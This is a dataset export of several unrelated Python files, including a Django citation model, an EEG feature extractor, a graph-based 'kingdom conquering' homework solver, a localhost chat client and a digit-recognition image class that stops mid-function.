ModelWithRelatedEntities):\n \"\"\"A source of content or information.\"\"\"\n\n attributee_html = models.CharField(\n max_length=MAX_ATTRIBUTEE_HTML_LENGTH, null=True, blank=True\n )\n attributee_string = models.CharField(\n max_length=MAX_ATTRIBUTEE_STRING_LENGTH, null=True, blank=True\n )\n attributees = models.ManyToManyField(\n to='entities.Entity',\n through='SourceAttribution',\n related_name='attributed_sources',\n blank=True, # Some sources may not have attributees.\n verbose_name=_('attributees'),\n )\n citation_html = models.TextField(\n verbose_name=_('citation HTML'),\n null=False, # cannot be null in db\n blank=True, # can be left blank in admin form\n )\n citation_string = models.CharField(\n max_length=MAX_CITATION_STRING_LENGTH,\n null=False, # cannot be null in db\n blank=True, # can be left blank in admin form\n unique=True,\n )\n containers = models.ManyToManyField(\n to='self',\n through='sources.SourceContainment',\n through_fields=('source', 'container'),\n related_name='contained_sources',\n symmetrical=False,\n blank=True,\n )\n date = HistoricDateTimeField(null=True, blank=True)\n description = HTMLField(null=True, blank=True, paragraphed=True)\n file = models.ForeignKey(\n to=SourceFile,\n related_name='sources',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n verbose_name='file',\n )\n location = models.ForeignKey(\n to='places.Place', null=True, blank=True, on_delete=models.SET_NULL\n )\n publication_date = HistoricDateTimeField(null=True, blank=True)\n related = GenericManyToManyField(\n 'quotes.Quote',\n 'occurrences.Occurrence',\n through='sources.Citation',\n related_name='sources',\n blank=True,\n )\n title = models.CharField(\n verbose_name=_('title'), max_length=MAX_TITLE_LENGTH, null=True, blank=True\n )\n url = models.URLField(\n max_length=MAX_URL_LENGTH,\n null=True,\n blank=True,\n help_text='URL where the source can be accessed online',\n )\n\n class Meta:\n ordering = ['-date']\n\n objects = PolymorphicSourceManager.from_queryset(PolymorphicSourceQuerySet)()\n searchable_fields = ['citation_string', 'description']\n serializer = SourceSerializer\n slug_base_field = 'title'\n\n def __str__(self):\n \"\"\"Return the source's string representation.\"\"\"\n return self.citation_string\n\n def clean(self):\n \"\"\"Prepare the source to be saved.\"\"\"\n super().clean()\n self.citation_html = self.calculate_citation_html()\n self.citation_string = soupify(self.citation_html).get_text()\n if not self.file:\n if self.containment and self.containment.container.file:\n self.file = self.containment.container.file\n if self.pk: # If this source is not being newly created\n is_duplicate = (\n Source.objects.exclude(pk=self.pk)\n .filter(citation_string=self.citation_string)\n .exists()\n )\n if is_duplicate:\n raise ValidationError(\n f'Unable to save this source because it duplicates an existing source '\n f'or has an identical string: {self.citation_string}'\n )\n for container in self.containers.all():\n if self in container.containers.all():\n raise ValidationError(\n f'This source cannot be contained by {container}, '\n f'because that source is already contained by this source.'\n )\n\n @property\n def ctype(self):\n return self.polymorphic_ctype\n\n @property\n def escaped_citation_html(self) -> SafeString:\n return format_html(self.citation_html)\n\n @property\n def calculate_attributee_html(self) -> Optional[str]:\n \"\"\"Return an HTML string representing the source's attributees.\"\"\"\n # Check for pk to avoid RecursionErrors with not-yet-saved objects\n has_attributees = self.attributees.exists() if self.pk else False\n if self.attributee_string:\n attributee_html = self.attributee_string\n if has_attributees:\n for entity in self.attributees.all().iterator():\n if entity.name in attributee_html:\n attributee_html = attributee_html.replace(\n entity.name, entity.name_html\n )\n else:\n logging.info(f'Returning preset creator string: {attributee_html}')\n return format_html(attributee_html)\n elif not has_attributees:\n return None\n attributees = self.ordered_attributees\n n_attributions = len(attributees)\n first_attributee = attributees[0]\n html = first_attributee.name_html\n if n_attributions == 2:\n html = f'{html} and {attributees[1].name_html}'\n elif n_attributions == 3:\n html = f'{html}, {attributees[1].name_html}, and {attributees[2].name_html}'\n elif n_attributions > 3:\n html = f'{html} et al.'\n return html\n\n def calculate_citation_html(self) -> str:\n \"\"\"Return the HTML representation of the source, including its containers.\"\"\"\n # TODO: html methods should be split into different classes and/or mixins.\n html = self.__html__()\n container_strings = self.get_container_strings()\n if container_strings:\n containers = ', and '.join(container_strings)\n html = f'{html}, {containers}'\n elif getattr(self, 'page_number', None):\n page_number_html = _get_page_number_html(\n self, self.file, self.page_number, self.end_page_number\n )\n html = f'{html}, {page_number_html}'\n if not self.file:\n if self.link and self.link not in html:\n html = f'{html}, retrieved from {self.link}'\n if getattr(self, 'information_url', None) and self.information_url:\n html = (\n f'{html}, information available at '\n f'{compose_link(self.information_url, href=self.information_url, target=\"_blank\")}'\n )\n the_code_below_is_good = False\n if the_code_below_is_good:\n # TODO: Remove search icon; insert link intelligently\n if self.file:\n html += (\n f''\n f''\n f''\n )\n elif self.url:\n link = self.url\n if self.page_number and 'www.sacred-texts.com' in link:\n link = f'{link}#page_{self.page_number}'\n html += (\n f''\n f''\n f''\n )\n return format_html(fix_comma_positions(html))\n\n @property\n def containment(self) -> Optional['SourceContainment']:\n \"\"\"Return the source's primary containment.\"\"\"\n try:\n return self.source_containments.first()\n except (ObjectDoesNotExist, AttributeError):\n return None\n\n @property\n def escaped_citation_html(self) -> SafeString:\n return format_html(self.citation_html)\n\n def get_container_strings(self) -> Optional[List[str]]:\n \"\"\"Return a list of strings representing the source's containers.\"\"\"\n containments = self.source_containments.order_by('position')[:2]\n container_strings = []\n same_creator = True\n for containment in containments:\n container_html = f'{containment.container.html}'\n\n # Determine whether the container has the same attributee\n if containment.container.attributee_html != self.attributee_html:\n same_creator = False\n\n # Remove redundant creator string if necessary\n creator_string_is_duplicated = (\n same_creator\n and self.attributee_html\n and self.attributee_html in container_html\n )\n if creator_string_is_duplicated:\n container_html = container_html[len(f'{self.attributee_html}, ') :]\n\n # Include the page number\n if containment.page_number:\n page_number_html = _get_page_number_html(\n containment.source,\n containment.source.file,\n containment.page_number,\n containment.end_page_number,\n )\n container_html = f'{container_html}, {page_number_html}'\n container_html = (\n f'{containment.phrase} in {container_html}'\n if containment.phrase\n else f'in {container_html}'\n )\n container_strings.append(container_html)\n return container_strings\n\n def get_date(self) -> Optional[HistoricDateTime]:\n \"\"\"Get the source's date.\"\"\" # TODO: prefetch container?\n if self.date:\n return self.date\n elif self.containment and self.containment.container.date:\n return self.containment.container.date\n return None\n\n @property # type: ignore\n @retrieve_or_compute(attribute_name='href')\n def href(self) -> Optional[str]:\n \"\"\"\n Return the href to use when providing a link to the source.\n\n If the source has a file, the URL of the file is returned;\n otherwise, the source's `url` field value is returned.\n \"\"\"\n if self.file:\n url = self.file.url\n page_number = self.file.default_page_number\n if getattr(self, 'page_number', None):\n page_number = self.page_number + self.file.page_offset\n if page_number:\n url = _set_page_number(url, page_number)\n else:\n url = self.url\n return url\n\n @property\n def link(self) -> Optional[SafeString]:\n \"\"\"Return an HTML link element containing the source URL, if one exists.\"\"\"\n if self.url:\n return format_html(f'{self.url}')\n return None\n\n @property\n def linked_title(self) -> Optional[SafeString]:\n \"\"\"Return the source's title as a link.\"\"\"\n if not self.title:\n return None\n html = (\n compose_link(\n self.title,\n href=self.href,\n klass='source-title display-source',\n target=NEW_TAB,\n )\n if self.href\n else self.title\n )\n return format_html(html)\n\n @property\n def ordered_attributees(self) -> List['Entity']:\n \"\"\"Return an ordered list of the source's attributees.\"\"\"\n try:\n attributions = self.attributions.select_related('attributee')\n return [attribution.attributee for attribution in attributions]\n except (AttributeError, ObjectDoesNotExist):\n return []\n\n @property # type: ignore\n @retrieve_or_compute(attribute_name='containers')\n def serialized_containments(self) -> List[Dict]:\n \"\"\"Return the source's containers, serialized.\"\"\"\n return [\n containment.container.serialize()\n for containment in self.source_containments.all().select_related(\n 'container'\n )\n ]\n\n def __html__(self) -> str:\n \"\"\"\n Return the source's HTML representation, not including its containers.\n\n Must be defined by models inheriting from Source.\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def components_to_html(components: Sequence[Optional[str]]):\n \"\"\"Combine a list of HTML components into an HTML string.\"\"\"\n return components_to_html(components, delimiter=COMPONENT_DELIMITER)\n\n\ndef _get_page_number_url(\n source: Source, file: SourceFile, page_number: int\n) -> Optional[str]:\n \"\"\"TODO: write docstring.\"\"\"\n url = source.file.url or None\n if not url:\n return None\n page_number += file.page_offset\n return _set_page_number(url, page_number)\n\n\ndef _get_page_number_link(url: str, page_number: int) -> Optional[str]:\n \"\"\"TODO: write docstring.\"\"\"\n if not url:\n return None\n return compose_link(page_number, href=url, klass='display-source', target=NEW_TAB)\n\n\ndef _get_page_number_html(\n source: Source,\n file: Optional[SourceFile],\n page_number: int,\n end_page_number: Optional[int] = None,\n) -> str:\n \"\"\"TODO: write docstring.\"\"\"\n pn_url = _get_page_number_url(source=source, file=file, page_number=page_number)\n pn = _get_page_number_link(url=pn_url, page_number=page_number) or page_number\n if end_page_number:\n end_pn_url = _get_page_number_url(\n source=source, file=file, page_number=end_page_number\n )\n end_pn = (\n _get_page_number_link(url=end_pn_url, page_number=end_page_number)\n or end_page_number\n )\n return f'pp. {pn}–{end_pn}'\n return f'p. {pn}'\n\n\ndef _set_page_number(url: str, page_number: Union[str, int]) -> str:\n page_param = 'page'\n if f'{page_param}=' in url:\n url = re.sub(rf'{page_param}=\\d+', f'{page_param}={page_number}', url)\n else:\n url = f'{url}#{page_param}={page_number}'\n return url\n","sub_path":"apps/sources/models/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":15480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"251015297","text":"import glob\nimport os\nimport shutil\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import resample\nfrom scipy.fftpack import rfft\nfrom sklearn import preprocessing # TODO check that\nimport scipy.io as sio\n\nimport argparse\nfrom tqdm import tqdm\n\n\ndef cmatrix_with_evals(data):\n \"\"\" Returns upper triangle of correlation matrix\n and its sorted eigenvalues. \"\"\"\n cm = np.corrcoef(preprocessing.scale(data, axis=1), rowvar=0)\n n = cm.shape[0]\n return np.concatenate([cm[np.triu_indices(n, 1)],\n np.sort(np.fabs(np.linalg.eigvalsh(cm)))],\n axis=0)\n\n\ndef compute_features(data):\n \"\"\" Return Birchwood features for data sequence. \"\"\"\n if np.allclose(data, 0):\n # nothing to do...\n return np.empty(0)\n\n # Birchwood takes a slice too\n power = np.absolute(rfft(data, axis=0))[50:2500]\n resampled = resample(power, num=18, axis=0)\n resampled[np.less_equal(resampled, 0)] = 1e-6 # fix the log10\n logfreq = np.log10(resampled)\n # skip data that produce NAs\n # if np.any(np.isnan(logfreq)) or np.allclose(data, 0):\n # return np.empty(0)\n features = [logfreq.ravel(),\n cmatrix_with_evals(logfreq),\n cmatrix_with_evals(data)]\n return np.concatenate(features, axis=0)\n\n\ndef data_sequences(data, dt=50):\n freq = 400.0\n n = data.shape[0]\n breaks = np.arange(0, n, dt * freq).astype('int')\n return (data[start:stop] for start, stop in zip(breaks[:-1], breaks[1:]))\n # for start, stop in zip(breaks[:-1], breaks[1:]):\n # seq = data[start:stop]\n # if np.allclose(seq, 0.0):\n # print(seq)\n # continue\n # else:\n # yield seq\n\n\ndef save_feature_matrix(data, fn):\n columns = ['target'] + ['A' + str(i) for i in xrange(data.shape[1] - 1)]\n df = pd.DataFrame(data, columns=columns)\n df.to_csv(fn, sep=';', index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', help='directory with data files')\n parser.add_argument('-t', '--test-ratio', type=float,\n action='store', default=-1,\n help='ratio of test data for cross-validation')\n parser.add_argument('-o', '--output', default='train-data.csv',\n help='csv output file.')\n parser.add_argument('-c', '--copy-train', action='store_true',\n help='copy files used for training.')\n args = parser.parse_args()\n\n test_dir = os.path.splitext(args.output)[0] + \"-test/\"\n train_dir = os.path.splitext(args.output)[0] + \"-train/\"\n if args.test_ratio > 0:\n shutil.rmtree(test_dir, ignore_errors=True)\n os.mkdir(test_dir)\n if args.copy_train:\n shutil.rmtree(train_dir, ignore_errors=True)\n os.mkdir(train_dir)\n\n train = []\n skipped = 0\n test_files = []\n for sfile in tqdm(glob.glob(os.path.join(args.data_dir, '*.mat'))):\n fileid = os.path.splitext(os.path.basename(sfile))[0]\n preictal = fileid[-1] == '1'\n\n content = sio.loadmat(sfile, struct_as_record=False,\n verify_compressed_data_integrity=False,\n squeeze_me=True)['dataStruct']\n data = content.data.astype(float)\n features = np.array(filter(lambda f: f.shape != (0,),\n [compute_features(d)\n for d in data_sequences(data)]))\n if features.shape == (0,):\n skipped += 1\n continue\n\n features = np.insert(features, 0, int(preictal), axis=1)\n if random.random() < args.test_ratio:\n tfile = os.path.join(test_dir,\n os.path.basename(fileid) + '.csv')\n save_feature_matrix(features, tfile)\n test_files.append(os.path.basename(sfile))\n else:\n if args.copy_train:\n shutil.copy(sfile,\n os.path.join(train_dir, os.path.basename(sfile)))\n train.append(features)\n\n save_feature_matrix(np.concatenate(train), args.output)\n print(\"Skipped {0:d} files, created {1:d} test files.\"\n .format(skipped, len(test_files)))\n","sub_path":"birchwood-features.py","file_name":"birchwood-features.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99918576","text":"import os\r\nimport sys\r\nsys.path.append('..')\r\nsys.path.append('../..')\r\nimport argparse\r\nimport utils\r\nfrom student_utils_sp18 import *\r\n\r\n\"\"\"\r\n======================================================================\r\n Complete the following function.\r\n======================================================================\r\n\"\"\"\r\n\r\ndef init_timesaved(time_saved, adjacency_matrix):\r\n for i in range(len(adjacency_matrix)): #for each kingdom i\r\n count = 0\r\n for j in range(len(adjacency_matrix[i])): #each j is a neighbor of i\r\n if i != j and adjacency_matrix[i][j] != 0:\r\n count += adjacency_matrix[i][j] #add the distance to neighbor j\r\n count += adjacency_matrix[j][j] #add the conquer cost for neighbor j\r\n time_saved[i] = count\r\n return time_saved\r\n\r\ndef update_timesaved(time_saved, just_conquered, adjacency_matrix, owned_kingdoms):\r\n # work on time_saved: go through adjacency mtx and for kingdom i, add on all values for mtx[i][j] where j != i and j != 'x'\r\n print(just_conquered)\r\n for i in range(len(adjacency_matrix)): #for each kingdom i\r\n if i != just_conquered and adjacency_matrix[i][just_conquered] != 0 and just_conquered not in owned_kingdoms: #if kingdom i has just_conquered as a neighbor\r\n # print(i)\r\n # print(adjacency_matrix[i][just_conquered]) \r\n # print(adjacency_matrix[just_conquered][just_conquered]) \r\n time_saved[i] -= adjacency_matrix[i][just_conquered] #subtract distance from i to just_conquered\r\n time_saved[i] -= adjacency_matrix[just_conquered][just_conquered] #subtract conquer cost of just_conquered\r\n for j in range(len(adjacency_matrix)): #for each kingdom j\r\n if i != j and j != just_conquered and adjacency_matrix[i][j] != 0 and i not in owned_kingdoms: #if j is a neighbor of the neighbor i\r\n time_saved[j] -= adjacency_matrix[i][j] #subtract distance from i to j\r\n time_saved[j] -= adjacency_matrix[j][j] #subtract conquer cost of j\r\n return time_saved\r\n\r\ndef update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances):\r\n # work on total_cost: go through johnson's matrix. \r\n for i in range(len(total_cost)):\r\n total_cost[i] = shortest_distances[current_kingdom][i] + adjacency_matrix[i][i]\r\n # to update: just update current_kingdom and rerun this code\r\n return total_cost\r\n\r\ndef update_values(values, time_saved, total_cost):\r\n # work on values: \r\n weight = 1 # CHANGE THIS VALUE\r\n values = [max(time_saved[i] - (weight * total_cost[i]), 0) for i in range(len(values))]\r\n #\r\n return values\r\n\r\ndef find_neighbors(current, adjacency_matrix):\r\n neighbors = []\r\n for i in range(len(adjacency_matrix)):\r\n if i != current and adjacency_matrix[i][current] != 0:\r\n neighbors.append(i)\r\n return neighbors\r\n\r\ndef load_adjacency_matrix (adjacency_matrix, G): \r\n result = [[0 for i in range(len(adjacency_matrix))] for j in range(len(adjacency_matrix))] \r\n d = nx.johnson(G)\r\n \r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n if(i == j):\r\n result[i][j] = []\r\n else:\r\n result[i][j] = d[i][j]\r\n \r\n return result\r\n \r\ndef calc_path_length(adjacency_matrix, johnson) :\r\n total = 0\r\n path_lengths = [[0 for j in range(len(adjacency_matrix))] for i in range(len(adjacency_matrix))] \r\n\r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n total = 0 \r\n current_path = johnson[i][j]\r\n for count in range(len(current_path) - 1):\r\n total += adjacency_matrix[current_path[count]][current_path[count+1]]\r\n path_lengths[i][j] = total\r\n return path_lengths\r\n\r\ndef solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=[]):\r\n \"\"\"\r\n Write your algorithm here.\r\n Input:\r\n list_of_kingdom_names: An list of kingdom names such that node i of the graph corresponds to name index i in the list\r\n starting_kingdom: The name of the starting kingdom for the walk\r\n adjacency_matrix: The adjacency matrix from the input file\r\n Output:\r\n Return 2 things. The first is a list of kingdoms representing the walk, and the second is the set of kingdoms that are conquered\r\n \"\"\" \r\n\r\n # initialize data structures\r\n n = len(list_of_kingdom_names)\r\n time_saved = [0] * n\r\n total_cost = [0] * n\r\n values = [0] * n\r\n current_kingdom = list_of_kingdom_names.index(starting_kingdom)\r\n\r\n walk = [current_kingdom]\r\n walk_length = 0\r\n kingdoms = set()\r\n owned_kingdoms = set()\r\n\r\n # USE JOHNSON'S ALG HERE: we need shortest_paths = output of johnson | shortest_distances = path lengths for paths\r\n tempadj = adjacency_matrix\r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n if tempadj[i][j] == 'x':\r\n tempadj[i][j] = 0\r\n\r\n npmtx = np.asarray(tempadj)\r\n G = nx.convert_matrix.from_numpy_matrix(npmtx)\r\n G = G.to_undirected()\r\n\r\n shortest_paths = load_adjacency_matrix(adjacency_matrix, G);\r\n shortest_distances = calc_path_length(adjacency_matrix, shortest_paths)\r\n ###### \r\n\r\n time_saved = init_timesaved(time_saved, adjacency_matrix)\r\n total_cost = update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances)\r\n values = update_values(values, time_saved, total_cost)\r\n\r\n\r\n #count=0\r\n while len(owned_kingdoms) != len(list_of_kingdom_names):\r\n if (max(values) != 0):\r\n target = np.argmax(np.asarray(values)) \r\n else:\r\n target = np.argmax(np.asarray(time_saved))\r\n\r\n # calculate stuff\r\n path = shortest_paths[current_kingdom][target]\r\n distance = shortest_distances[current_kingdom][target]\r\n\r\n # conquer it\r\n walk.extend(path[1:])\r\n walk_length += (distance + adjacency_matrix[target][target])\r\n kingdoms.add(target)\r\n current_kingdom = target\r\n time_saved[target] = 0\r\n neighbors = find_neighbors(target, adjacency_matrix)\r\n for e in neighbors:\r\n owned_kingdoms.add(e)\r\n time_saved = update_timesaved(time_saved, target, adjacency_matrix, owned_kingdoms)\r\n total_cost = update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances)\r\n values = update_values(values, time_saved, total_cost)\r\n\r\n\r\n if walk[len(walk)-1] != list_of_kingdom_names.index(starting_kingdom):\r\n walk.append(list_of_kingdom_names.index(starting_kingdom))\r\n\r\n closed_walk = []\r\n conquered_kingdoms = set()\r\n\r\n for k in walk:\r\n closed_walk.append(list_of_kingdom_names[k])\r\n\r\n for k in kingdoms:\r\n conquered_kingdoms.add(list_of_kingdom_names[k])\r\n\r\n\r\n return closed_walk,conquered_kingdoms\r\n\r\n\r\n \r\n\r\n\"\"\"\r\n======================================================================\r\n No need to change any code below this line\r\n======================================================================\r\n\"\"\"\r\n\r\n\r\ndef solve_from_file(input_file, output_directory, params=[]):\r\n print('Processing', input_file)\r\n \r\n input_data = utils.read_file(input_file)\r\n number_of_kingdoms, list_of_kingdom_names, starting_kingdom, adjacency_matrix = data_parser(input_data)\r\n closed_walk, conquered_kingdoms = solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=params)\r\n\r\n basename, filename = os.path.split(input_file)\r\n output_filename = utils.input_to_output(filename)\r\n output_file = f'{output_directory}/{output_filename}'\r\n if not os.path.exists(output_directory):\r\n os.makedirs(output_directory)\r\n utils.write_data_to_file(output_file, closed_walk, ' ')\r\n utils.write_to_file(output_file, '\\n', append=True)\r\n utils.write_data_to_file(output_file, conquered_kingdoms, ' ', append=True)\r\n\r\n\r\ndef solve_all(input_directory, output_directory, params=[]):\r\n input_files = utils.get_files_with_extension(input_directory, 'in')\r\n\r\n for input_file in input_files:\r\n solve_from_file(input_file, output_directory, params=params)\r\n\r\n\r\nif __name__==\"__main__\":\r\n parser = argparse.ArgumentParser(description='Parsing arguments')\r\n parser.add_argument('--all', action='store_true', help='If specified, the solver is run on all files in the input directory. Else, it is run on just the given input file')\r\n parser.add_argument('input', type=str, help='The path to the input file or directory')\r\n parser.add_argument('output_directory', type=str, nargs='?', default='.', help='The path to the directory where the output should be written')\r\n parser.add_argument('params', nargs=argparse.REMAINDER, help='Extra arguments passed in')\r\n args = parser.parse_args()\r\n output_directory = args.output_directory\r\n if args.all:\r\n input_directory = args.input\r\n solve_all(input_directory, output_directory, params=args.params)\r\n else:\r\n input_file = args.input\r\n solve_from_file(input_file, output_directory, params=args.params)","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140191864","text":"import select\nimport socket\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 8001\n\n\ndef prompt():\n sys.stdout.write('-> ')\n sys.stdout.flush()\n\n\nif __name__ == \"__main__\":\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n\n try:\n s.connect((HOST, PORT))\n except Exception:\n sys.exit()\n\n while 1:\n socket_list = [sys.stdin, s]\n\n read_sockets, _, _ = select.select(socket_list, [], [])\n\n for sock in read_sockets:\n if sock == s:\n data = sock.recv(4096).decode()\n if not data:\n sys.exit()\n else:\n sys.stdout.write(f\"\\r{data}\")\n prompt()\n\n else:\n msg = sys.stdin.readline()\n s.send(msg.encode())\n prompt()\n","sub_path":"lab1/chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175168482","text":"'''\n\tFile: DigitRecognizer.py\n\t\n\tProject starting file\n\tAuthors: Michael Pruitt (mkp3632), Samuel Kirschbaum (sxk1869), Georgia Partyka( gap8240), Andrew Scialla (axs7942)\n'''\n\nimport math\nimport numpy\nimport sys\nfrom Cluster import *\nfrom FLD import *\nfrom NaiveBayes import *\n\n# Image constants\nWIDTH = 28\nHEIGHT = 28\nAVAL = \"AVal\"\n\nLENGTH = WIDTH * HEIGHT\n\n# Normalization constants\nMARK_THRESH = 1\nMARK = \"#\"\nBLANK = \".\"\n\n# I/O constants\nFEATURE_FILE = \"features.csv\"\n\nclass Image():\n\t\"\"\"\n\t\tClass to hold an image and all its features\n\t\tFields\n\t\t\tid\t\t\t- the image's unique id\n\t\t\torig \t\t- the original image with values 0-255\n\t\t\tnorm \t\t- normalized image with MARK or BLANK values\n\t\t\tfeatures\t- a dictionary of name, value pairs of features\n\t\t\tactual\t\t- the actual value from training data\n\t\t\tprediction\t- the predicted value\n\t\"\"\"\n\t\n\t# Static id counter\n\tid = 0\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitializes an empty image with a unique id (starts from 0)\n\t\t\"\"\"\n\t\tself.id = Image.id\n\t\tImage.id += 1\n\t\t\n\t\tself.orig = list()\n\t\tself.norm = list()\n\t\t\n\t\tself.features = {}\n\t\tself.actual = -1\n\t\tself.prediction = -1\n\t\t\t\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tReturns a string representation of the image, along with its id and\n\t\t\tlist of features and values\n\t\t\"\"\"\n\t\tresult = \"Id: %i\\nImage:\\n\"%(self.id)\n\t\t\n\t\t# Image\n\t\tfor r in range(len(self.norm)):\n\t\t\tfor c in range(len(self.norm[0])):\n\t\t\t\tresult += str(self.norm[r][c]) + ' '\n\t\t\tresult += '\\n'\n\t\t\t\n\t\t# Features\n\t\tresult += \"Features:\\n\"\n\t\tfor key in self.features:\n\t\t\tresult += \"\\t%s: %s\\n\"%(key, str(self.features[key]))\n\t\t\n\t\treturn result\n\n\tdef toCsvString(self):\n\t\t\"\"\"\n\t\t\tReturns a string containing the id and feature values sorted\n\t\t\tby feature name alphabetically in comma separated format.\n\t\t\"\"\"\n\t\tresult = str(self.id)\n\t\t\t\n\t\t# Features\n\t\tfor key in sorted(self.features):\n\t\t\tresult += ',' + str(self.features[key])\n\t\t\n\t\treturn result\n\t\t\n\tdef featureList(self):\n\t\t\"\"\"\n\t\t\tReturns a string containing ID and feature names sorted\n\t\t\talphabetically in comma separated format.\n\t\t\"\"\"\n\t\tresult = \"ID\"\n\t\t\t\n\t\t# Features\n\t\tfor key in sorted(self.features):\n\t\t\tresult += ',' + key\n\t\t\n\t\treturn result\n\t\n\tdef calculateFeatures(self):\n\t\t\"\"\"\n\t\t\tCalculates the feature values for this image. Must have image data.\n\t\t\"\"\"\n\t\tif len(self.norm) < HEIGHT or len(self.norm[0]) < WIDTH:\n\t\t\treturn null\n\t\t\t\n\t\tself.calculateWtoH()\n\t\tself.calculateCorners()\n\t\tself.calculateDistFromCenter()\n\t\tself.calculateTotalMarks()\n\t\tself.features[AVAL] = self.actual\n\t\n\tdef calculateCorners(self):\n\t\t\"\"\"\n\t\t\tCalculates the amount of distance to nearest corner using euclidean\n\t\t\tAuthor : Georgia\n\t\n\t\ttopLeft \t= [0, 0]\n\t\ttopRight \t= [0, WIDTH-1]\n\t\tbotLeft \t= [HEIGHT -1, 0]\n\t\tbotRight \t= [HEIGHT -1, WIDTH-1]\n\t\t\"\"\"\n\t\t\n\t\tdistTopLeft = distTopRight = distBotLeft = distBotRight = 100\n\n\t\tdist = 0;\n\n\t\tfor i in range(WIDTH):\n\t\t\tfor j in range(HEIGHT): \n\t\t\t\t\n\t\t\t\tif self.norm[i][j] == MARK:\n\t\t\t\t\t\"\"\"top left\"\"\"\n\t\t\t\t\tdist = (i + j)\n\t\t\t\t\tif dist < distTopLeft:\n\t\t\t\t\t\tdistTopLeft = dist;\n\t\t\t\t\t\"\"\"top right\"\"\"\n\t\t\t\t\tdist = (((WIDTH-1) - i) + j)\n\t\t\t\t\tif dist < distTopRight:\n\t\t\t\t\t\tdistTopRight = dist;\n\t\t\t\t\t\"\"\"bot left\"\"\"\n\t\t\t\t\tdist = (i + ((HEIGHT-1) - j))\n\t\t\t\t\tif dist < distBotLeft:\n\t\t\t\t\t\tdistBotLeft = dist;\n\t\t\t\t\t\"\"\"bot right\"\"\"\n\t\t\t\t\tdist = (((WIDTH-1) - i) + ((HEIGHT-1) - j))\n\t\t\t\t\tif dist < distBotRight:\n\t\t\t\t\t\tdistBotRight = dist;\n\n\t\tself.features[\"distTL\"] = distTopLeft\n\t\tself.features[\"distTR\"] = distTopRight\n\t\tself.features[\"distBL\"] = distBotLeft\n\t\tself.features[\"distBR\"] = distBotRight\n\t\n\tdef calculateDistFromCenter(self):\n\t\t\"\"\"\n\t\t\t Calculates the Distance from Center for the image, or the distance\n\t\t\t from the center to the point nearest the center in the image. Stores\n\t\t\t the result in the features dictionary as DistFromCenter and returns\n\t\t\t the value. Only works if the image contains the image data.\n\t\t\t \n\t\t\t Note that center is a 2x2 block because of even pixel lengths\n\t\t\"\"\"\n\t \n\t\tshortestDist = 100000\n\t\ttempDist = -1\n\t\t\n\t\tfor c in range(HEIGHT):\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tdist1 = math.sqrt(math.pow(c - (HEIGHT/2), 2) + math.pow(r - (WIDTH/2), 2))\n\t\t\t\t\tdist2 = math.sqrt(math.pow(c - (HEIGHT/2), 2) + math.pow(r - (WIDTH/2 - 1), 2))\n\t\t\t\t\tdist3 = math.sqrt(math.pow(c - (HEIGHT/2 - 1), 2) + math.pow(r - (WIDTH/2), 2))\n\t\t\t\t\tdist4 = math.sqrt(math.pow(c - (HEIGHT/2 - 1), 2) + math.pow(r - (WIDTH/2 - 1), 2))\n\t\t\t\t\t\n\t\t\t\t\ttempDist = dist1\n\t\t\t\t\tif dist2 < tempDist:\n\t\t\t\t\t\ttempDist = dist2\n\t\t\t\t\t\t\n\t\t\t\t\tif dist3 < tempDist:\n\t\t\t\t\t\ttempDist = dist3\n\t\t\t\t\t\t\n\t\t\t\t\tif dist4 < tempDist:\n\t\t\t\t\t\ttempDist = dist4\n\t\t\t\t\t\t\n\t\t\t\t\tif tempDist < shortestDist:\n\t\t\t\t\t\tshortestDist = tempDist\n\t\t\t\t\t\n\t\tself.features[\"DistFromCenter\"] = shortestDist\n\t\treturn shortestDist\n\n\tdef calculateTotalMarks(self):\n\t\ttotalMarks = 0\n\t\tfor x in range(WIDTH):\n\t\t\tfor y in range(HEIGHT):\n\t\t\t\tif self.norm[x][y] == MARK:\n\t\t\t\t\ttotalMarks += 1\n\n\t\tself.features[\"TotalMarks\"] = totalMarks\n\t\treturn totalMarks\n \n\tdef calculateWtoH(self):\n\t\t\"\"\"\n\t\t\tCalculates the Width to height ratio for the image, storing it in\n\t\t\tthe features dictionary as WtoH and returning the value. Only works\n\t\t\tif the image contains the image data\n\t\t\"\"\"\n\t\tcol = [0, 0]\n\t\trow = [0, 0]\n\t\t\n\t\t# min col\n\t\tdone = False\n\t\tfor c in range(HEIGHT):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tcol[0] = c\n\t\t\t\t\tdone = True\n\t\t\n\t\t# max col\n\t\tdone = False\n\t\tfor c in range(HEIGHT-1, -1, -1):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tcol[1] = 